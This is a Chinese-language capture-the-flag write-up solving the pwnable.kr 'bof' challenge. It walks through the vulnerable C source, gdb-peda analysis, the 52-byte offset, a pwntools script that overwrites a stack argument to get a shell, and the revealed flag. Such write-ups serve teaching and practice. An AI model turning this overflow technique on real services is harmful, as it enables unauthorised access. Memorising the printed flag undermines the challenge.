Pwnable-Bof writeup

Author Avatar
iosmosis 12月 23, 2017
  • 在其它设备中阅读本文章

个人比较菜 就想分享下自己的思路和过程 如果有问题欢迎大家批评指点

题目网站:http://pwnable.kr

题目

Bof 32位经典缓冲区溢出题目

解题过程

因为题目提供了源码所以先看看代码

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);    // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}
  • 可以看到关键点gets函数这里 可能会引起缓冲区溢出

接着丢bof到gdb 查看下汇编代码

gdb-peda$ disass main
Dump of assembler code for function main:
   0x0000068a <+0>:    push   ebp
   0x0000068b <+1>:    mov    ebp,esp
   0x0000068d <+3>:    and    esp,0xfffffff0
   0x00000690 <+6>:    sub    esp,0x10
   0x00000693 <+9>:    mov    DWORD PTR [esp],0xdeadbeef
   0x0000069a <+16>:    call   0x62c <func>
   0x0000069f <+21>:    mov    eax,0x0
   0x000006a4 <+26>:    leave  
   0x000006a5 <+27>:    ret    
End of assembler dump.

当0xdeadbeef作为参数传递时,它会在调用func之前添加到堆栈中 然后在这里下断查看下它在哪


gdb-peda$ b *main+16
Breakpoint 1 at 0x69a
gdb-peda$ r
Starting program: /home/ios/bof 

[----------------------------------registers-----------------------------------]
EAX: 0xf7fb9dbc --> 0xffffd13c --> 0xffffd31a ("XDG_VTNR=7")
EBX: 0x0 
ECX: 0x5bca2c32 
EDX: 0xffffd0c4 --> 0x0 
ESI: 0xf7fb8000 --> 0x1afdb0 
EDI: 0xf7fb8000 --> 0x1afdb0 
EBP: 0xffffd098 --> 0x0 
ESP: 0xffffd080 --> 0xdeadbeef 
EIP: 0x5655569a (<main+16>:    call   0x5655562c <func>)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x5655568d <main+3>:    and    esp,0xfffffff0
   0x56555690 <main+6>:    sub    esp,0x10
   0x56555693 <main+9>:    mov    DWORD PTR [esp],0xdeadbeef
=> 0x5655569a <main+16>:    call   0x5655562c <func>
   0x5655569f <main+21>:    mov    eax,0x0
   0x565556a4 <main+26>:    leave  
   0x565556a5 <main+27>:    ret    
   0x565556a6:    nop
Guessed arguments:
arg[0]: 0xdeadbeef 
[------------------------------------stack-------------------------------------]
0000| 0xffffd080 --> 0xdeadbeef 
0004| 0xffffd084 ("PRUV\271VUV")
0008| 0xffffd088 --> 0x565556b9 (<__libc_csu_init+9>:    add    ebx,0x193b)
0012| 0xffffd08c --> 0x0 
0016| 0xffffd090 --> 0xf7fb8000 --> 0x1afdb0 
0020| 0xffffd094 --> 0xf7fb8000 --> 0x1afdb0 
0024| 0xffffd098 --> 0x0 
0028| 0xffffd09c --> 0xf7e20637 (<__libc_start_main+247>:    add    esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x5655569a in main ()

可以看到,传入func之前他在ESP: 0xffffd080 –> 0xdeadbeef
然后汇编看下func

gdb-peda$ disass func
Dump of assembler code for function func:
   0x5655562c <+0>:    push   ebp
   0x5655562d <+1>:    mov    ebp,esp
   0x5655562f <+3>:    sub    esp,0x48
   0x56555632 <+6>:    mov    eax,gs:0x14
   0x56555638 <+12>:    mov    DWORD PTR [ebp-0xc],eax
   0x5655563b <+15>:    xor    eax,eax
   0x5655563d <+17>:    mov    DWORD PTR [esp],0x5655578c
   0x56555644 <+24>:    call   0xf7e67140 <puts>
   0x56555649 <+29>:    lea    eax,[ebp-0x2c]
   0x5655564c <+32>:    mov    DWORD PTR [esp],eax
   0x5655564f <+35>:    call   0xf7e66890 <gets>
   0x56555654 <+40>:    cmp    DWORD PTR [ebp+0x8],0xcafebabe
   0x5655565b <+47>:    jne    0x5655566b <func+63>
   0x5655565d <+49>:    mov    DWORD PTR [esp],0x5655579b
   0x56555664 <+56>:    call   0xf7e42940 <system>
   0x56555669 <+61>:    jmp    0x56555677 <func+75>
   0x5655566b <+63>:    mov    DWORD PTR [esp],0x565557a3
   0x56555672 <+70>:    call   0xf7e67140 <puts>
   0x56555677 <+75>:    mov    eax,DWORD PTR [ebp-0xc]
   0x5655567a <+78>:    xor    eax,DWORD PTR gs:0x14
   0x56555681 <+85>:    je     0x56555688 <func+92>
   0x56555683 <+87>:    call   0xf7efd790 <__stack_chk_fail>
   0x56555688 <+92>:    leave  
   0x56555689 <+93>:    ret    
End of assembler dump.

在 0x56555654 <+40>: cmp DWORD PTR [ebp+0x8],0xcafebabe 处 下断

gdb-peda$ n
overflow me : 
AAAAAAAAAA

[----------------------------------registers-----------------------------------]
EAX: 0xffffd04c ("AAAAAAAAAA")
EBX: 0x0 
ECX: 0xf7fb85a0 --> 0xfbad2288 
EDX: 0xf7fb987c --> 0x0 
ESI: 0xf7fb8000 --> 0x1afdb0 
EDI: 0xf7fb8000 --> 0x1afdb0 
EBP: 0xffffd078 --> 0xffffd098 --> 0x0 
ESP: 0xffffd030 --> 0xffffd04c ("AAAAAAAAAA")
EIP: 0x56555654 (<func+40>:    cmp    DWORD PTR [ebp+0x8],0xcafebabe)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x56555649 <func+29>:    lea    eax,[ebp-0x2c]
   0x5655564c <func+32>:    mov    DWORD PTR [esp],eax
   0x5655564f <func+35>:    call   0xf7e66890 <gets>
=> 0x56555654 <func+40>:    cmp    DWORD PTR [ebp+0x8],0xcafebabe
   0x5655565b <func+47>:    jne    0x5655566b <func+63>
   0x5655565d <func+49>:    mov    DWORD PTR [esp],0x5655579b
   0x56555664 <func+56>:    call   0xf7e42940 <system>
   0x56555669 <func+61>:    jmp    0x56555677 <func+75>
[------------------------------------stack-------------------------------------]
0000| 0xffffd030 --> 0xffffd04c ("AAAAAAAAAA")
0004| 0xffffd034 --> 0xffffd0d4 --> 0xd28e2a50 
0008| 0xffffd038 --> 0xf7fb8000 --> 0x1afdb0 
0012| 0xffffd03c --> 0xd267 
0016| 0xffffd040 --> 0xffffffff 
0020| 0xffffd044 --> 0x2f ('/')
0024| 0xffffd048 --> 0xf7e14dc8 --> 0x2b76 ('v+')
0028| 0xffffd04c ("AAAAAAAAAA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 2, 0x56555654 in func ()
`

AAAAAAAAAA 的指针位于堆栈的顶部,它指向地址ESP: 0xffffd030 –> 0xffffd04c (“AAAAAAAAAA”)

所以可以计算偏移量
gdb-peda$ p/d 0xffffd080 - 0xffffd04c
$1 = 52

有了偏移量 就可以写payload了

from pwn import *
#p = process('./bof')
p = remote('pwnable.kr',9000)
payload = 'A'*52 + '\xbe\xba\xfe\xca'
p.send(payload)
p.interactive()

运行结果…

ios@ubuntu:~$ python bof.py
[+] Opening connection to pwnable.kr on port 9000: Done
[*] Switching to interactive mode
$ ls
bof
bof.c
flag
log
log2
super.pl
$ cat flag
daddy, I just pwned a buFFer :)